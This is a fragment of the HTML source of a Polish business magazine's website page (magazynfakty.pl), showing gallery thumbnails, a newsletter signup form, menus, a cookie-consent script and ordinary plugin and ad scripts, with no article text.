
<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/fiat-500x/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2015/08/IMG_11561-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/miedzynarodowy-salon-przemyslu-obronnego-2014/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2014/09/IMG_67171-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    
<div style="clear:both"></div></div><!--end widget --></li>
</div>
            </div></div>
            <div class="kolumna4"><div class="wew">
                <div class="sidebar">
                  <li id="wysija-2" class="widget widget_wysija"><h3 class="site-title"><span>Zapisz się do naszego newslettera</span></h3><div class="widget_wysija_cont"><div id="msg-form-wysija-2" class="wysija-msg ajax"></div><form id="form-wysija-2" method="post" action="#wysija" class="widget_wysija">
<p class="wysija-paragraph">
    
    
    	<input type="text" name="wysija[user][firstname]" class="wysija-input " title="Imię i Nazwisko" placeholder="Imię i Nazwisko" value="">
    
    
    
    <span class="abs-req">
        <input type="text" name="wysija[user][abs][firstname]" class="wysija-input validated[abs][firstname]" value="">
    </span>
    
</p>
<p class="wysija-paragraph">
    
    
    	<input type="text" name="wysija[user][email]" class="wysija-input validate[required,custom[email]]" title="Email" placeholder="Email" value="">
    
    
    
    <span class="abs-req">
        <input type="text" name="wysija[user][abs][email]" class="wysija-input validated[abs][email]" value="">
    </span>
    
</p>

<input class="wysija-submit wysija-submit-field" type="submit" value="Zapisz się!">

    <input type="hidden" name="form_id" value="1">
    <input type="hidden" name="action" value="save">
    <input type="hidden" name="controller" value="subscribers">
    <input type="hidden" value="1" name="wysija-page">

    
        <input type="hidden" name="wysija[user_list][list_ids]" value="1">
    
 </form></div></li>
</div>
            </div></div>
            <div class="kolumna4"><div class="wew">
                <div class="sidebar">
                   <li id="nav_menu-2" class="widget widget_nav_menu"><h3 class="site-title"><span>Magazyn Fakty</span></h3><div class="menu-magazyn-fakty-container"><ul id="menu-magazyn-fakty" class="menu"><li id="menu-item-14957" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14957"><a href="http://magazynfakty.pl/o-magazynie/">O Magazynie FAKTY</a></li>
<li id="menu-item-14955" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14955"><a href="http://magazynfakty.pl/archiwum/">Archiwum Magazynu</a></li>
<li id="menu-item-14958" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14958"><a href="http://magazynfakty.pl/prenumerata/">Prenumerata</a></li>
<li id="menu-item-14960" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14960"><a href="http://magazynfakty.pl/reklama/">Reklama</a></li>
<li id="menu-item-14959" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14959"><a href="http://magazynfakty.pl/redakcja/">Redakcja</a></li>
<li id="menu-item-14956" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14956"><a href="http://magazynfakty.pl/kontakt/">Kontakt</a></li>
</ul></div></li>
</div>
            </div></div>
        </div>
    </div>
</div>
<div class="core mf-bg-page">
    <div class="container-mf mf-bg-page">
            <div class="row-mf">
              <div class="kolumna12"><div class="wew">
                    <footer>Wszystkie prawa zastrzeżone | All rights reserved <a href="http://magazynfakty.pl/">Magazyn Fakty</a>  <strong>2019</strong> </footer>     
              </div></div>
            </div>
    </div>
</div>

<a class="scrollup"><i class="fa fa-chevron-up"></i></a>

<style>

.mf-plugin-cookie-btn-acc {background-color:#f00;}

</style>

<script>
	function WHCreateCookie(name, value, days) {
		var date = new Date();
		date.setTime(date.getTime() + (days*24*60*60*1000));
		var expires = "; expires=" + date.toGMTString();
		document.cookie = name+"="+value+expires+"; path=/";
	}
	function WHReadCookie(name) {
		var nameEQ = name + "=";
		var ca = document.cookie.split(';');
		for(var i=0; i < ca.length; i++) {
			var c = ca[i];
			while (c.charAt(0) == ' ') c = c.substring(1, c.length);
			if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
		}
		return null;
	}
	window.onload = WHCheckCookies;
	function WHCheckCookies() {
		if(WHReadCookie('cookies_accepted') != 'T') {
			var message_container = document.createElement('div');
			message_container.id = 'cookies-message-container';
			var html_code = '<div id="cookies-message" style="padding: 10px 0px; background:#000; font-size: 14px; line-height: 28px;  text-align: center; width:100%; z-index: 999; color:#fff"><div style=" max-width:1140px; margin:auto;"> Ta strona używa plików Cookies. Dowiedz się więcej o celu ich używania i możliwości zmiany ustawień Cookies w przeglądarce. <a href="http://wszystkoociasteczkach.pl" target="_blank">czytaj więcej</a> <a class="mf-plugin-cookie-btn-acc" href="javascript:WHCloseCookiesWindow();" id="accept-cookies-checkbox" name="accept-cookies" style=" padding: 2px 10px 2px 10px; color: #FFF; display: inline-block; margin-left: 10px; text-decoration: none; cursor: pointer;">Rozumiem</a></div></div>';
			message_container.innerHTML = html_code;
			document.body.appendChild(message_container);
		}
	}
	function WHCloseCookiesWindow() {
		WHCreateCookie('cookies_accepted', 'T', 365);
		document.getElementById('cookies-message-container').removeChild(document.getElementById('cookies-message'));
	}
</script>
 
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery(window).scroll(function(){
if ( jQuery(this).scrollTop() > 150) {
jQuery('.mf-plugin-stickymenu-wrapper').fadeIn();
} else {
jQuery('.mf-plugin-stickymenu-wrapper').fadeOut();
}
}); 
});
</script>
 
<div class="mf-plugin-stickymenu-wrapper">
<div class="mf-sticky-menu-container">
<nav>
<div class="menu-glowne-container"><div class="mf-plugin-sticky-menu"><ul><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-14975"><a href="http://magazynfakty.pl/"><i class="fa fa-home"></i></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-14405"><a href="http://magazynfakty.pl/kategoria/gospodarka/">Gospodarka</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14443"><a href="http://magazynfakty.pl/kategoria/jakosc/">Jakość</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14444"><a href="http://magazynfakty.pl/kategoria/innowacje/">Innowacje</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14519"><a href="http://magazynfakty.pl/kategoria/budownictwo/">Budownictwo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14522"><a href="http://magazynfakty.pl/kategoria/samorzad/">Samorząd</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14523"><a href="http://magazynfakty.pl/kategoria/unia-europejska/">Unia Europejska</a></li>
<li class="mf-search-btn-hide-menu mf-right-menu-position no-mobile menu-item menu-item-type-custom menu-item-object-custom menu-item-14416"><a href="#"><i class="fa fa-search"></i></a></li>
<li class="mf-right-menu-position menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-13568"><a href="http://magazynfakty.pl/magazyn-fakty/">Magazyn FAKTY</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14961"><a href="http://magazynfakty.pl/o-magazynie/">O Magazynie FAKTY</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14442"><a href="http://magazynfakty.pl/redakcja/">Redakcja</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14962"><a href="http://magazynfakty.pl/prenumerata/">Prenumerata</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14441"><a href="http://magazynfakty.pl/reklama/">Reklama</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14397"><a href="http://magazynfakty.pl/kontakt/">Kontakt</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14398"><a href="http://magazynfakty.pl/archiwum/">Archiwum Magazynu</a></li>
</ul>
</li>
</ul></div></div></nav>
</div>  
</div> 
 
<style>
.mf-plugin-stickymenu-wrapper { background:#c81121; color:#ffffff; display:none;position:fixed; top:0px; left:0px; width:100%; z-index: 199999999999 ;}
.mf-plugin-stickymenu-wrapper-fixed { background:#c81121; color:#ffffff; position:fixed; top:0px; left:0px; width:100%; z-index: 199999999999 ;}
.mf-sticky-menu-container { max-width:1140px; margin:0 auto}
.mf-hide-menu-btn { z-index:1999999999999; cursor:pointer; position:fixed; padding:10px 20px; font-size:26px; color:#FFF; top:200px; right:0px; background:#000}
.mf-hide-menu-btn:hover{-moz-transform:scale(1.2);-webkit-transform:scale(1.2);-o-transform:scale(1.2);-ms-transform:scale(1.2);transform:scale(1.2)}
@media screen and (max-width : 760px){	
.mf-plugin-stickymenu-wrapper {display:none !important;}}
.mf-plugin-sticky-menu{width:100%;}
.mf-plugin-sticky-menu ul{list-style-type:none;margin:0;padding:0}
.mf-plugin-sticky-menu li{display:inline-block;float:left}
.mf-plugin-sticky-menu li a{font-size:16px;padding: 8px 20px 8px 20px;display:block; -webkit-transition: all 300ms ease;-moz-transition: all 300ms ease;-ms-transition: all 300ms ease;-o-transition: all 300ms ease;transition: all 300ms ease; color:#ffffff; }
.mf-plugin-sticky-menu li a:hover{background:#ccc;color:#fff}
.mf-plugin-sticky-menu li a:hover > mf-plugin-sticky-menu li ul{display:block}
.mf-plugin-sticky-menu li ul{position:absolute;display:none;z-index:19999999999999999;}
.mf-plugin-sticky-menu li:hover ul{display:block ; -webkit-animation: fadeIn 300ms; animation: fadeIn 300ms;}
.mf-plugin-sticky-menu li ul li{display:block;min-width:200px;float:none;background:#000;margin:0;padding:0}
.mf-plugin-sticky-menu li ul li a {padding: 3px 15px 3px 15px; color:#fff}
.mf-sticky-menu-logo { width:30%; float:left}
.mf-sticky-menu-logo h1 {padding:0px; margin:0px}
.mf-sticky-menu-content { height:70%; float:left}
</style>

<style>

*,*:before,*:after{box-sizing:inherit}
embed,iframe,object{max-width:100%;width:100%}
.grid{margin-right:3.2%;float:left;display:inline;position:relative}
.one-third{width:31.2%}
.one-full{margin-right:0;width:100%;overflow:hidden}
.two-third{width:65.6%}
.last{clear:right;margin-right:0 !important}

.video-container iframe, .video-container object, .video-container embed, .video-container video {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
        
.videos-focus {
    margin-bottom: 1em;
}
.videos-focus .heading {
    color: #e54e53;
}
.videos-focus .row {
    border: 1px solid #EAEAEA;
    padding: 10px;
}
.videos-focus .first {
    border: 1px solid #EAEAEA;
    padding: 10px;
    background: #FFF;
	float: right;
}
.videos-focus .third {
    margin-top: 20px;
}
.videos-focus .grid-bottom {
    margin-top: 20px;
}
.videos-focus img {
    width: 100%;
}
.videos-focus h3 {
    position: absolute;
    font-size: 1.2rem;
    line-height: 1;
    z-index: 2;
    overflow: hidden;
    bottom: 0px;
    left: 80px;
    padding: 10px;
    right: 10px;
}
.videos-focus h3 span {
    hyphens: auto;
    background: #000;
    background-color: rgba(0,0,0,0.5);
    color: #fff;
    font-weight: bold;
	text-transform:uppercase;
    display: inline;
    line-height: 1.9em;
    font-weight: 400;
	padding: 5px 0;
}

.videos-focus .video-title {
	position: absolute;
}


.videos-focus span.video-icon {
    position: absolute;
    z-index: 2;
    overflow: hidden;
    left: 10px;
    width: 50px;
    height: 50px;
    color: #FFF;
	background: url('http://magazynfakty.pl/wp-content/plugins/mf-plugin-video/images/play.png') 0 0 no-repeat transparent;
	bottom: 10px;
}
.videos-focus a {
    display: block;
    max-height: 208px;
    overflow: hidden;
	position: relative;
	display: block;
}

.mf-btn-play {
	position: absolute;
	left: 20px;
	top: 20px;
    width: 50px;
    height: 50px;
	background: url('http://magazynfakty.pl/wp-content/plugins/mf-plugin-video/images/play.png') 0 0 no-repeat transparent;
	z-index:1999;
}

.mf-btn-play-thumb {
	position: absolute;
	left: 5%;
	top: 10%;
    width: 50px;
    height: 50px;
	background: url('http://magazynfakty.pl/wp-content/plugins/mf-plugin-video/images/play.png') 0 0 no-repeat transparent;
	z-index:1999;
}

.mf-title-video { background: #000;
    background: rgba(0, 0, 0, 0.5);
    padding: 5px; color:#FFF; position: absolute; bottom:20px; left:20px ; z-index: 199;}

.mf-title-video-b { font-size:25px}



.youtube-container{display:block;margin:20px auto;width:100%;max-width:600px}.youtube-wrapper{display:block;width:100%;padding-bottom:56.25%;overflow:hidden;position:relative;width:100%;height:100%;cursor:hand;cursor:pointer;display:block}img.youtube-thumb{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;height:auto}div.play-button{height:445px;width:445px;left:30%;top:6%;margin-left:-36px;margin-top:-36px;position:absolute}#youtube-iframe{width:100%;height:100%;position:absolute;top:0;left:0}.youtube-wrapper span.video-icon{position:absolute;z-index:2;overflow:hidden;left:26%;top:5%;font-size:400px;line-height:400px;color:#FFF}
</style>
	
	
	
	<link rel="stylesheet" id="simple-share-buttons-adder-ssba-css" href="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/css/ssba.css?ver=fb7ace8cf477567d3cd46575c275f43a" type="text/css" media="all">
<style id="simple-share-buttons-adder-ssba-inline-css" type="text/css">
	.ssba {
									
									
									
									
								}
								.ssba img
								{
									width: 35px !important;
									padding: px;
									border:  0;
									box-shadow: none !important;
									display: inline !important;
									vertical-align: middle;
									box-sizing: unset;
								}
								
								#ssba-classic-2 .ssbp-text {
									display: none!important;
								}
								
								.ssba .fb-save
								{
								padding: px;
								line-height: 30px; }
								.ssba, .ssba a
								{
									text-decoration:none;
									background: none;
									
									
									
									font-weight: bold;
								}
								
@font-face {
				font-family: 'ssbp';
				src:url('http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.eot?xj3ol1');
				src:url('http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.eot?#iefixxj3ol1') format('embedded-opentype'),
					url('http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.woff?xj3ol1') format('woff'),
					url('http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.ttf?xj3ol1') format('truetype'),
					url('http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.svg?xj3ol1#ssbp') format('svg');
				font-weight: normal;
				font-style: normal;

				/* Better Font Rendering =========== */
				-webkit-font-smoothing: antialiased;
				-moz-osx-font-smoothing: grayscale;
			}
</style>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/anti-spam/js/anti-spam-5.2.js"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/js/ssba.js?ver=fb7ace8cf477567d3cd46575c275f43a"></script>
<script type="text/javascript">
Main.boot( [] );
</script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/themes/rsd_rwd_5_0/js/mfscript.js?ver=fb7ace8cf477567d3cd46575c275f43a"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-includes/js/wp-embed.min.js?ver=fb7ace8cf477567d3cd46575c275f43a"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-pl.js?ver=2.10.2"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.10.2"></script>
<script type="text/javascript">
/* <![CDATA[ */
var wysijaAJAX = {"action":"wysija_ajax","controller":"subscribers","ajaxurl":"http:\/\/magazynfakty.pl\/wp-admin\/admin-ajax.php","loadingTrans":"\u0141aduj\u0119...","is_rtl":""};
/* ]]> */
</script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.10.2"></script>

<div id="fb-root" class=" fb_reset"><div style="position: absolute; top: -10000px; width: 0px; height: 0px;"><div><iframe name="fb_xdm_frame_https" frameborder="0" allowtransparency="true" allowfullscreen="true" scrolling="no" allow="encrypted-media" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" src="https://staticxx.facebook.com/connect/xd_arbiter/r/d_vbiawPdxB.js?version=44#channel=f479dd015e04aa&amp;origin=http%3A%2F%2Fmagazynfakty.pl" style="border: none;"></iframe></div><div></div></div></div><iframe src="https://c.sharethis.mgr.consensu.org/v1.0/cmp/portal.html" id="st_gdpr_iframe" style="width: 0px; height: 0px; position: absolute; left: -5000px;"></iframe><ins class="adsbygoogle adsbygoogle-noablate" data-adsbygoogle-status="done" style="display: none !important;"><ins id="aswift_0_expand" style="display:inline-table;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><ins id="aswift_0_anchor" style="display:block;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><iframe frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_0" name="aswift_0" style="left:0;position:absolute;top:0;border:0px;width:0px;height:0px;"></iframe></ins></ins></ins><iframe id="google_osd_static_frame_4623454388712" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;"></iframe><div id="cookies-message-container"><div id="cookies-message" style="padding: 10px 0px; background:#000; font-size: 14px; line-height: 28px;  text-align: center; width:100%; z-index: 999; color:#fff"><div style=" max-width:1140px; margin:auto;"> Ta strona używa plików Cookies. Dowiedz się więcej o celu ich używania i możliwości zmiany ustawień Cookies w przeglądarce. <a href="http://wszystkoociasteczkach.pl" target="_blank">czytaj więcej</a> <a class="mf-plugin-cookie-btn-acc" href="javascript:WHCloseCookiesWindow();" id="accept-cookies-checkbox" name="accept-cookies" style=" padding: 2px 10px 2px 10px; color: #FFF; display: inline-block; margin-left: 10px; text-decoration: none; cursor: pointer;">Rozumiem</a></div></div></div></body><iframe id="google_shimpl" style="display: none;"></iframe><iframe id="google_esf" name="google_esf" src="https://googleads.g.doubleclick.net/pagead/html/r20190320/r20190131/zrt_lookup.html#" data-ad-client="ca-pub-9090873593537305" style="display: none;"></iframe></html>